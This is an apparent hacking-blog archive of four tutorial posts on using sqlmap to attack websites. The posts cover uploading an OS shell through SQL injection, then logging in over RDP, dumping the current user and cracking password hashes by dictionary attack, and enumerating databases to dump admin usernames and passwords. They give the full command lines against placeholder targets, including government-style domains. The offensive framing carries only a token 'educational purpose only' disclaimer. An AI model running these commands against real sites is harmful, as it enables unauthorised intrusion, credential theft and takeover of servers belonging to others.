Category Archives: SQLMAP

How To Upload Shell Using SQLMAP than get RDP

~
Hey Salam Guyz
Today i’ll tell y0uh 
Shell Uploading through SQLmap

its very easy if you have few thing 😉

-1st-
Vulnerable website with full path
-2nd-
file write privilleges
-3rd-
sqlmap
-4th-
Me 😀

start it

open your sqlmap
i have sqlmap with its GUI
so work becomes very easy 😀
you can also use sqlmap shell without its GUI just type this
./sqlmap.py -u http:www.site.in/index.php?id=1 –os-shell

link to use sqlmap with GUI
1st tick on the url box
now paste the vulnerable link in target box
than click on Get Query and you’ll see website appears on the 
“Query To Sqlmap box”
like in picture
Now 0pen “Access” tab in sqlmap
than => operating System
than => sqlshell
and tick sqlshell 
then again click on Get query
Than click on start button
than windows will pop up after 1-2 minutes 
it will ask y0u f0r enter Web application Language
like in this pic
web server is mysql so i’ll choose 4 PHP (Default)
it will start working again
and than asked y0u to give web root path
“Web Root Path”
the text y0u g0t from error like
mysql_error /home/india/public_html
this is called web root path

in my case my root path is
mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\DavWeb\src\controllers\photocontroller.php
my root path =>
C:\xampp\htdocs\DavWeb\
sometimes SQLMAP automatically get the root path like in this pic

please provide any additional web server full path to try to upload the agent 
[Enter for None]:
just press Enter


wOha! Shell uploaded =))

it will automatically connect the shell with sqlmap/cmd
Pic =>


shell uploaded =>

========================================
you can als0 get RDP from the shell 😛

just type in Run =>
mstsc.exe and enter website’s ip
and enter your password and enjoy 😀

thankx for reading 

Note:For Educational Purpose Only

How To Get Root With SQLMAP?

~


Salam Awl 🙂

Today Im Going To Show Y0uh-
How to Get Current-User With SQL map?
+shell Uploading With SQLMAP =))—————-|
1) Backtrack 5R2 |
2) SQLMap       |
3) SQL Vuln Web.|
—————-|
——————–
Start Your Backtrack 5R2–

Open SQL map

Type:-
python sqlmap.py -u http://www.vulnsite.in/index.php?id=1 -v 1 –current-user –password

Let It Work 😉

After 1 0r 2 mintues

It Will Show:
Do You want To use Dictionary attack 0n retrieved Password hashes?
Type :
y
It will start Dictionary attack-
Press Enter,Enter 😉

Now, Y0u have r00t Passw0rd =)) =))


Note:Its Only Works 0n Few websites..TrY y0ur LuCk 😉
Note:For Educational Purpose ONLY!!

How To Run SQLMAP In Windows ?

~

./Sa|aM*


========================
Today i’ll Tell Y0u
How To Use SQLmap In WindOws
Note:-Educational Purpose OnlY!
========================
====================
1st) Download Python 2.7
install it. it will take just 5 mints..
=====================

======================
2nd) Then D0wnload Sqlmap
download zip file
======================

then unzip it with 7zip 0r Winrar

=============================
Goto Start Menu => Run => type cmd
and change directory to sqlmap..where you unzipped it
mine is
D:/sqlmap/sqlmap.py
so you type in cmd 
 C:\Documents and Settings\killed>cd D:/sqlmap
then 
D:/sqlmap>python sqlmap.py

type in cmd :

python sqlmap.py -u http://www.site.gov.in/index.php?id=1

it will start working 🙂

Comment For HeLp

SQL Injection Using SQLMAP

~

Salam,
T0day i’ll teach y0uh how to “sql injection” with Sqlmap!

dafuq is sqlmap ?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
Lets Back t0 Injecting…
1st 0v all download sqlmap from its official website..
download python 2.7
 now open cmd
Start => Run => cmd
now change directory(cd) to where y0u have unzipped sqlmap
cmd:>cd D:/sqlmap
-Injecting Part –
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -dbs
wut is -u ? its mean URL 
what is -dbs ? its mean “Database” this command will find database(s)
it will start working
 after database found
now this >
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D database_name –tables
 wut is -D means database name ..
site_database
information_schema
if you want to get the tables of site_database
you’ll give this command 
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database –tables
 tables found
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database -T “table_name_here” –columns
it will give y0u the columns
for admin table column must be like = username,password,uid,email etc..
how to get password from columns ?
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database -T admin –dump
it will dump the username and password from admin table..
 if there is a hash,y0u can als0 bruteforce it via sqlmap 😉
comment for any queries 🙂

For educational Purpose Only:-